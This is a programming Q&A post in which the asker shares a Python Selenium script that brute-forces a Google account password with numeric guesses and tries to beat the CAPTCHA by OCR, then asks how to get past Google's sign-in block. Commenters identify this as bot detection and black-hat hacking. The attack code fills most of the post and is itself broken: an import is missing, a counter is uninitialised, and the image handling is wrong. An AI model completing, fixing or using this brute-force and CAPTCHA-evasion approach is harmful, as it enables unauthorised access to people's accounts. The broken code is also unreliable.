# Is google blocking my account from sign ins?

Tags: python, selenium, google-chrome

A few weeks ago I began a project that aimed to guess google sign in passwords that were comprised of a number 1-100000. I used selenium to request and navigate around a chrome browser, however just recently I have been getting an error saying "Couldn't sign you in, this browser or app may not be secure". I this a google security feature or am I doing something wrong. If so is there a way around it? Not sure where it went wrong so I'll just include the whole code. [image]

```
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import pytesseract
import requests

# Setup global variables
global guessCount
global cracked
global driver


def enterEmail():
    global cracked
    driver.implicitly_wait(2)
    email = driver.find_element(By.ID, "identifierId")
    email.send_keys('testacc3644@gmail.com' + Keys.RETURN)
    driver.implicitly_wait(3)
    cracked = 'true'


def defeat_recaptcha():
    global cracked
    driver.implicitly_wait(6)
    captcha_img_element = driver.find_element(By.ID, "captchaimg")
    captcha_img_link = captcha_img_element.get_attribute("src")
    print(captcha_img_link)
    img = requests.get(captcha_img_link, stream=True)
    cracked = 'true'
    # Process image
    word = pytesseract.image_to_string(img)
    print(word)
    # Get captcha box
    code = driver.find_element(By.ID, "ca")
    code.send_keys(word + Keys.RETURN)
    cracked = 'true'


def main():
    global driver
    driver = webdriver.Chrome()
    driver.get('https://accounts.google.com/signin/v2/identifier?elo=1&flowName=GlifWebSignIn&flowEntry=ServiceLogin')


    enterEmail()
    while cracked == 'true':
        driver.implicitly_wait(5)
        if driver.find_element(By.ID, "captchaimg") is not None:
            # run inside loop to crack recaptcha
            defeat_recaptcha()
        if driver.find_element(By.NAME, 'password') is not None:
            passwd = driver.find_element(By.NAME, 'password')
            guess = 10000 + guessCount
            guessCount = guessCount + 1
            inputGuess = str(guess) + '000'
            passwd.send_keys(inputGuess + Keys.RETURN)
            passwd.clear()
            # Get captcha image
        print(guess)


if __name__ == "__main__":
    main()
```

Comment: bot detection.   Trying to solve the captcha using tesseract is actually kind of funny, but you know and I know that won't do it.... and the puzzle isn't really a part of the detection... it's just a puzzle.

Comment: would changing the email get rid of it temporarily, because this was not happening before.

Comment: some of the bot detection is behavior driven... it sort of teaches itself that you are a bot.  Besides this is plain black-hat hacking.  I would look into criminal law books in your jurisdiction.  Or maybe make a post at Law Exchange on this site to see if what you are doing is legal.

Answer (score 0):

is a google security feature, google knows when you are using a bot and well, is obvious that is insecure to use a bot to access websites

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).